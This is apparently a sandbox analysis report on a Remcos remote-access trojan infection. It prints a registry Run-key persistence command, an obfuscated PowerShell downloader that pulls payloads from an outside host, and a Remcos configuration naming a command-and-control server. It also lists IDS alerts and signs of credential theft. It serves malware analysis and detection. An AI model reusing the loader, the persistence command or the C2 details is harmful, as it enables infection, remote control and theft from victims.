"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)", ProcessId: 6964, ProcessName: cmd.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar 
aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHopllMotoiRetosSenseStard emo.ForeHCo,ae OpgaCha dSel

              Stealing of Sensitive Information

Source: Registry Key set; Author: Joe Security: Data: Details: 54 18 23 A9 DF 30 C1 62 3F FE C6 67 DF 31 E3 CA B8 49 EC 9B 9A F7 7A 8F 6F 70 26 31 99 50 27 05 10 98 5A 30 67 87 B3 7C FF C1 91 CB 52 7E 91 DD F9 21 12 00 5D BA A1 22 8B FF D0 C8 BA F2 59 C1 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 2996, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-MC4T64\exepath

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-22T09:40:42.309016+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49881 | 143.244.46.150 | 51525 | TCP
2024-10-22T09:40:44.230804+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49892 | 143.244.46.150 | 51525 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-22T09:40:43.893685+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.6 | 49893 | 178.237.33.50 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-22T09:40:36.573377+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49846 | 104.21.56.189 | 443 | TCP

              AV Detection

              Source: 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["pikolee.duckdns.org:51525:1"], "Assigned name": "power", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MC4T64", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: Yara match | File source: 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000009.00000003.2601743861.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000009.00000002.4585582185.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000009.00000003.2602767372.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000009.00000003.2569144632.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 2996, type: MEMORYSTR
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
              Source: unknown | HTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.6:49846 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2417345393.0000000008268000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: msiexec.exe, 00000010.00000002.2590132545.0000000002DC8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2410836893.0000000007247000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2410836893.00000000071B8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb0 source: powershell.exe, 00000005.00000002.2410836893.00000000071B8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.2410836893.00000000071B8000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_21BD10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 9_2_21BD10F1
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_21BD6580 FindFirstFileExA, 9_2_21BD6580
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0040AE51 FindFirstFileW,FindNextFileW, 15_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 16_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 18_2_00407898
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft

              Networking

              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49881 -> 143.244.46.150:51525
              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49892 -> 143.244.46.150:51525
              Source: Malware configuration extractor | URLs: pikolee.duckdns.org
              Source: unknown | DNS query: name: pikolee.duckdns.org
              Source: global traffic | TCP traffic: 192.168.2.6:49881 -> 143.244.46.150:51525
              Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
              Source: Joe Sandbox View | IP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox View | ASN Name: COGENT-174US COGENT-174US
              Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49893 -> 178.237.33.50:80
              Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49846 -> 104.21.56.189:443
              Source: global traffic | HTTP traffic detected: GET /Kvalificeredes.qxd HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: plieltd.top | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /dUEhUdoBD66.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: plieltd.top | Cache-Control: no-cache
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: msiexec.exe, 00000009.00000002.4597306369.0000000021BA0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exe, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 0000000F.00000002.2597692373.00000000047D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: msiexec.exe, 0000000F.00000002.2597692373.00000000047D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: msiexec.exe, 00000009.00000002.4597777003.0000000022420000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000009.00000002.4597777003.0000000022420000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global traffic | DNS traffic detected: DNS query: plieltd.top
              Source: global traffic | DNS traffic detected: DNS query: pikolee.duckdns.org
              Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005EDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4585582185.0000000005F04000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2540195237.0000000005FBB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2569144632.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, bhv6E57.tmp.15.dr | String found in binary or memory: http://geoplugin.net/json.gp
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp#
              Source: msiexec.exe, 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp4
              Source: msiexec.exe, 00000009.00000003.2540195237.0000000005FBB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpalo
              Source: msiexec.exe, 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2569144632.0000000005F68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpl
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gplA
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpw
              Source: powershell.exe, 00000002.00000002.2257431898.00000244184D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000005.00000002.2380563936.0000000004818000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2235185548.000002440A1E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://plieltd.top
              Source: powershell.exe, 00000002.00000002.2235185548.0000024408461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2380563936.00000000046C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.2380563936.0000000004818000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: msiexec.exe, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com
              Source: msiexec.exe, msiexec.exe, 00000012.00000003.2575617457.0000000002D8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2575587073.0000000002D8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2583210513.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2575637815.0000000002D8D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com
              Source: msiexec.exe, 00000009.00000002.4597306369.0000000021BA0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: msiexec.exe, 00000012.00000003.2575617457.0000000002D8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2575587073.0000000002D8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000002.2583210513.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2575637815.0000000002D8D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.compData
              Source: msiexec.exe, 00000009.00000002.4597306369.0000000021BA0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
              Source: msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/
              Source: msiexec.exe, 0000000F.00000002.2596870063.00000000027E4000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net~
              Source: powershell.exe, 00000002.00000002.2235185548.0000024408461000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.2380563936.00000000046C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000005.00000002.2380563936.0000000004818000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2235185548.0000024409019000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2262357013.00000244205FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.co5
              Source: msiexec.exe | String found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000002.00000002.2257431898.00000244184D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.2235185548.0000024409A19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2235185548.000002440868C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://plieltd.top
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://plieltd.top/
              Source: powershell.exe, 00000002.00000002.2235185548.000002440868C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://plieltd.top/Kvalificeredes.qxdP
              Source: powershell.exe, 00000005.00000002.2380563936.0000000004818000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://plieltd.top/Kvalificeredes.qxdXRgl8
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F04000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4596776958.00000000217E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://plieltd.top/dUEhUdoBD66.bin
              Source: msiexec.exe, 00000009.00000002.4596776958.00000000217E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://plieltd.top/dUEhUdoBD66.binRekosMaggaranticonstruct.ro/dUEhUdoBD66.bin
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://plieltd.top/dUEhUdoBD66.bine
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://plieltd.top/s
              Source: msiexec.exe, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://www.office.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownHTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.6:49846 version: TLS 1.2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0041183A OpenClipboard,GetLastError,15_2_0041183A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_0040987A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004098E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_00406DFC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_00406E9F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_004068B5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,18_2_004072B5

              E-Banking Fraud

              Source: Yara match File source: 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000009.00000003.2601743861.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000009.00000002.4585582185.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000009.00000003.2602767372.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000009.00000003.2569144632.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: msiexec.exe PID: 2996, type: MEMORYSTR

              System Summary

              Source: amsi32_6776.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2912, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6776, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00401806 NtdllDefWindowProc_W
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004018C0 NtdllDefWindowProc_W
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004016FD NtdllDefWindowProc_A
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004017B7 NtdllDefWindowProc_A
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00402CAC NtdllDefWindowProc_A
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00402D66 NtdllDefWindowProc_A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD3476B0F6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD3476BEA2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD347670F3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD34764D55
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD347669CD
